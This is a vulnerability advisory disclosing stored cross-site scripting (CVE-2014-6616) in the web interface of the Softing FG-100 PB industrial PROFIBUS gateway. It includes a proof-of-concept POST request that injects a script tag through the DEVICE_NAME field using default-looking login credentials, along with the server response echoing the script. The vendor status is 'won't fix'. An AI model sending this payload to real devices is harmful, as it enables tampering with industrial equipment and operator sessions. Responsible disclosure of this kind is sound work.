#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:   Softing FG-100 PB
# Vendor:    Softing AG (www.softing.com)
# CVD ID:    CVE-2014-6616
# Subject:   XSS
# Risk:      High 
# Effect:    Remotely exploitable
# Author:    Johannes Klick
# 	       Daniel Marzin
# 	       Ingmar Rosenhagen
# Date:      05.11.2014 
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. This
device is used in industrial setups for making Profibus device available
via ethernet. Compass Security Deuschland GmbH [2] discovered a security
flaw in the webgui of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web gui does not properly encode output of user data in at least one
place.  Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code 

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O
RG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device   Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong>  Host Name
</strong></td><td>  <SCRIPT>alert("XSS")</SCRIPT>  </td><td>
</td></tr><tr><td><strong>  IP Address  </strong></td><td>  192.168.2.3
</td><td>     </td></tr><tr><td><strong>  Subnet Mask
</strong></td><td>  255.255.255.0  </td><td>
</td></tr><tr><td><strong>  Default Gateway  </strong></td><td>
</td><td>     </td></tr><tr><td><strong>  Maintenance IP Address
</strong></td><td>  192.168.212.231  </td><td>
</td></tr><tr><td><strong>  New network parameters will be used
</strong></td><td>  immediately
</td><td></td></tr></table><br></body></html>



Workaround / Fix:
-----------------
no patch is available

Timeline:
---------
Vendor Notified:    2014-09-15 
Vendor Response:    2014-10-24    
Vendor Status:	    Wont fix

References:
-----------
[1]:
http://industrial.softing.com/de/produkte/profibus-master-or-slave-configura
ble-single-channel-remote-interface.html
[2]:   http://www.csnc.de